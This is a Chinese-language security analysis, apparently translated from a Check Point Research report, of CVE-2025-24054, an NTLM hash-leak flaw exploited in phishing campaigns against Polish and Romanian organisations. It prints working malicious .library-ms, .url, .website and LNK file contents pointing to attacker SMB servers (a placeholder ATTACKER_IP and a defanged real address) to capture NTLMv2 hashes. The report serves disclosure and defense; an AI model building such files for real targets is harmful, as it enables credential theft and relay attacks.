背景介绍

NTLM（新技术 LAN 管理器）是微软开发的一套身份验证协议，用于验证用户身份并保护网络通信的完整性和机密性。

NTLM 通过客户端和服务器之间的直接交换（称为 NTLM 质询/响应机制）进行操作，服务器向客户端发出质询，客户端需证明其身份，而无需在网络上传输用户的实际密码。

最初的 NTLMv1 存在多个安全缺陷，使其易受诸如“传递哈希”和彩虹表攻击等威胁。

在 NTLMv1 中，客户端响应服务器的质询时会发送用户密码的可预测哈希（NT 哈希），攻击者若能截获此哈希，便可尝试离线破解密码或重用该哈希。

为降低这些风险，微软引入了 NTLMv2，通过在身份验证过程中添加随机服务器质询和客户端质询， 显著提高了安全性。NTLMv2 不直接发送 NT 哈希值，而是生成一个称为 NTLMv2 响应 （也称为 NTLMv2-SSP 哈希或 Net-NTLMv2 ）的唯一响应，这使得预先计算的攻击（如彩虹表和传递哈希值）在很大程度上无效。

然而，如果攻击者能够捕获这些 NTLMv2 响应，仍可尝试离线暴力破解哈希或执行中继攻击。NTLM 中继攻击属于中间人（MitM）攻击的一种，攻击者截获身份验证过程中的哈希，并将其传递给另一个服务，以用户身份进行验证，若被盗凭据属于特权用户，中继攻击的危害更大，攻击者可利用其进行权限提升和横向移动。

在过去几个月中，微软发布了多项安全更新，旨在修复通过欺骗导致的 NTLM 哈希泄露漏洞，其中之一是 CVE-2024-43451，该漏洞于 2024 年 11 月 12 日被修补，此前曾在针对乌克兰的攻击活动中被利用。

CVE-2025-24054

微软于 2025 年 3 月 11 日发布了一项安全补丁，用于修复 Windows 资源管理器中的一个漏洞，该漏洞在从 ZIP 压缩包中提取恶意 .library-ms 文件时，会泄露 NTLMV2-SSp。

该漏洞的 CVE 编号为 CVE-2025-24054 ，并在所有最新的 Windows 版本中均被利用，当用户提取包含恶意 .library-ms 文件的 ZIP 压缩包时，会触发该漏洞。

此事件将触发 Windows 资源管理器向远程服务器发起 SMB 身份验证请求，从而在无需任何用户交互的情况下泄露用户的 NTLM 哈希值。

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescriptionxmlns="<http://schemas.microsoft.com/windows/2009/library>">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\ATTACKER_IP\SHARE_NAME</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

下图演示了用户的 NTLMV2-SSp 哈希通过 SMB 泄露到 IP 地址为 194.127.179[.]157 恶意 SMB 服务器的网络活动，一旦用户以最少的交互触发漏洞利用，客户端就会发起 SMB 请求，在处理 NTLMSSP_AUTH 消息时，客户端无意中将用户的 NTLMV2-SSp 泄露给恶意服务器。

用户的 NTLMV2-SSp 哈希值一旦泄露，攻击者可以通过暴力破解或中继攻击获取用户密码，如果被入侵的帐户拥有高权限且采取了不当的缓解措施（例如 SMB 签名和 NTLM 中继保护），则可能导致横向移动、提权，甚至整个域被入侵。

微软最初为该漏洞分配的 CVE 编号为 CVE-2025-24071 ，后来更新为 CVE-2025-24054 。

攻击活动

在微软发布安全补丁八天后， Check Point Research 发现了第一起利用 CVE-2025-24054 的攻击活动，截至 3 月 25 日，已观察到大约另外 10 起攻击活动，其最终目标是从目标受害者那里获取 NTLMV2-SSp 哈希值。收集这些哈希值的 SMB 服务器分别托管在俄罗斯、保加利亚、荷兰、澳大利亚和土耳其。

NTLM 漏洞炸弹攻击活动

该攻击活动似乎发生在 2025 年 3 月 20 日至 21 日左右，主要目标疑似为波兰和罗马尼亚政府及私人机构，该攻击活动通过电子邮件钓鱼链接瞄准受害者，其中包含一个从 Dropbox 下载的存档文件，一旦用户下载并提取存档内容，就会触发漏洞，泄露 NTLMV2-SSp 哈希值。

xd.library-ms

从 Dropbox 下载的压缩包名为xd.zip，其中包含用于泄露 NTLMV2-SSp 哈希值的文件，这四个嵌入的文件会联系 IP 地址为 159.196.128[.]120 的恶意 SMB 服务器。

一旦解压文件，就会触发 CVE-2025-24054， 即 NTLM 哈希泄露欺骗漏洞。

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescriptionxmlns="<http://schemas.microsoft.com/windows/2009/library>">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\159.196.128[.]120\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

xd.url

.URL文件用于创建指向Web地址的Internet快捷方式， URL是存储网站地址的纯文本文件，双击.url文件时，默认的Web浏览器将打开相应的URL。 .URL文件类型还可以通过UNC（通用命名约定）路径引用网络资源， UNC路径指向网络位置，通常的格式为：

\\ServerName\SharedFolder\Resource

此路径表示网络共享（例如，另一台计算机上的共享文件夹或文件），创建的连接主要基于所使用的网络协议以及如何共享资源。

使用UNC路径建立的最常见的连接类型涉及服务器消息块（SMB）协议，触发支持UNC路径的文件可能会导致SMB（服务器消息块）连接，该连接可能会泄露敏感信息，包括NTLMV2哈希。

该存档中嵌入的.URL文件与CVE-2024-43451漏洞相关联，该漏洞同样在野外被积极利用，利用涉及包含恶意代码的.url 文件，这些代码几乎无需通过用户过多交互即可执行，这些交互包括右键单击文件、删除或执行拖放操作。

[InternetShortcut]
URL=file://159.196.128[.]120/
IconIndex=4
HotKey=0
IDList=
IconFile=\\159.196.128[.]120\share\pentestlab.ico

.website

.website 文件的功能类似于 .url 文件，但包含一些为现代网络应用设计的额外元数据，这些文件存储 URL 信息以及额外的数据，例如浏览器设置、特定应用的设置和用于固定网络应用的图标，使它们比简单的 .url 文件更先进，它们还可以通过 UNC 路径链接到本地或网络资源，一旦用户手动与这些文件交互，就会触发 SMB 连接。

[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
Prop4=31,go.microsoft.com
[InternetShortcut]
URL=file://159.196.128[.]120/
[{A7AF692E-098D-4C08-A225-D433CA835ED0}]
Prop5=3,0
Prop9=19,0
Prop2=65,2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF310000002B000000710600006204000056
Prop6=3,1
[{9F4C2855-9F79-4B39-A8D0-E1D42DE1D5F3}]
Prop5=8,Microsoft.Website.B4BD2547.99055A5E

xd.lnk

.lnk 文件扩展名用于 Windows 快捷方式，快捷方式本质上是对另一个文件、文件夹或程序的指针或引用。

当双击 .lnk 文件时，Windows 会自动打开链接的目标文件或应用程序，这可能是一个程序、文档，或者可以用来通过 UNC 路径指向网络资源。

一旦 LNK 文件的目标路径是远程服务器，就会触发 SMB 连接，并在 NTLMSSP_AUTH 消息后，客户端无意中泄露用户的 NTLMV2-SSp，以下 LNK 文件作为此存档的一部分分发，需要手动用户交互来触发 SMB 连接。以下是 LNK 元数据：

Target Path      : \\159.196.128.120
Working Directory: None
Arguments        : None
Description      : None
Icon Location    : None
Relative Path    : ..\..\..\..\Windows
Show Command     : Normal

所有提到的文件，一旦用户手动点击，就会尝试访问网络共享，启动 SMB 连接，这可能会将 NTLMV2-SSp 哈希散列泄露给攻击者。

然而，其中两个使用漏洞的文件甚至不需要用户采取此类操作， 159.196.128[.]120 的 SMB 服务器收集了这些散列，可能用于进一步的攻击操作。

2024 年 1 月，网络安全公司 HarfangLab 报告称此 IP 与 APT28 有关，该组织也称为 Fancy Bear 或 Forest Blizzard，一个由俄罗斯政府支持的威胁组织，然而截止目前，没有直接将此 IP 与所述 APT 组织联系起来的更多证据。

关键点

CVE-2025-24054 是一个与 NTLM 哈希泄露相关的欺骗漏洞，攻击者可通过精心构造的 .library-ms 文件进行利用。自 2025 年 3 月 19 日起，已观察到该漏洞在野外被积极利用，可能导致攻击者泄露 NTLM 哈希或用户密码，从而危及系统安全。

尽管微软于 2025 年 3 月 11 日发布了补丁，但威胁行为者在漏洞被积极滥用之前已有一周多的时间开发和部署漏洞利用工具。

在 2025 年 3 月 20 至 21 日期间，一场针对波兰和罗马尼亚政府及私营机构的攻击活动被发现，攻击者通过恶意垃圾邮件分发包含多个已知漏洞（包括 CVE-2025-24054）的 Dropbox 链接，旨在收集 NTLMv2-SSP 哈希。

最初的报告指出，只有在解压 .library-ms 文件后才会触发漏洞，然而，微软的补丁文档表明，即使是最小的用户交互（如右键点击、拖放或仅仅浏览包含恶意文件的文件夹）也可能触发该漏洞，此漏洞似乎是先前已修补的 CVE-2024-43451 的变体，两者在多个方面具有相似性。

防护建议

为防范 CVE-2025-24054 漏洞的利用，建议采取以下措施：

• 更新系统补丁：确保操作系统和相关软件已安装微软于 2025 年 3 月 11 日发布的安全更新

• 提高用户安全意识：教育用户不要随意打开或交互未知来源的文件，尤其是压缩包中的 .library-ms 文件

• 部署安全防护措施：使用支持检测和防护 NTLM 哈希泄露的安全解决方案，及时发现并阻止潜在攻击。

原文来自：https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild

- END -